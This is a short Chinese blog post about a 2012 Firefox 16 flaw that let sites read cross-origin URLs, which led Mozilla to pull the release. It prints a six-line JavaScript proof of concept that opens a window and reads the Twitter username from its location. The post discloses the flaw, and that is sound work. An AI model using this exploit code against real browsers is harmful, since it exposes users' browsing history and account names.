火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。
Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”
下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:
-
function poc(){
-
var win = window.open('', 'newWin', 'width=200, height=200');
-
setTimeout(function(){
-
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
-
}, 5000);
-
}
这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!
阅读(1021) | 评论(0) | 转发(0) |